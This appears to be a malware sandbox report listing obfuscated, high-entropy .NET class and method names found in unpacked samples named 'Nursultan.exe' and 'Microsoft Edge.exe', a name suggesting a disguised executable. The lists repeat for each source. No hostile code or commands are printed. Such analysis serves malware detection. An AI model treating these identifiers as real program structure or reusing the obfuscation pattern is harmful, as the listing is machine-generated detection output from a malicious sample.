                            Source: Microsoft Edge.exe.0.dr, 0PFivgO7qv3FO.csHigh entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
                            Source: Microsoft Edge.exe.0.dr, 4XGrZpv9Z38Gc.csHigh entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: Microsoft Edge.exe.0.dr, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: Microsoft Edge.exe.0.dr, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.csHigh entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.csHigh entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.csHigh entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, jHz7doq0Y7v0T.csHigh entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, OHxtQZ957hKI5.csHigh entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.csHigh entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 0PFivgO7qv3FO.csHigh entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 4XGrZpv9Z38Gc.csHigh entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'
                            Source: Microsoft Edge.3.dr, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.csHigh entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
                            Source: Microsoft Edge.3.dr, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.csHigh entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
                            Source: Microsoft Edge.3.dr, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
                            Source: Microsoft Edge.3.dr, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.csHigh entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
                            Source: Microsoft Edge.3.dr, jHz7doq0Y7v0T.csHigh entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
                            Source: Microsoft Edge.3.dr, OHxtQZ957hKI5.csHigh entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.csHigh entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
                            Source: Microsoft Edge.3.dr, 0PFivgO7qv3FO.csHigh entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
                            Source: Microsoft Edge.3.dr, 4XGrZpv9Z38Gc.csHigh entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: Microsoft Edge.3.dr, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: Microsoft Edge.3.dr, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.csHigh entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.csHigh entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.csHigh entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, jHz7doq0Y7v0T.csHigh entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, OHxtQZ957hKI5.csHigh entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.csHigh entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 0PFivgO7qv3FO.csHigh entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
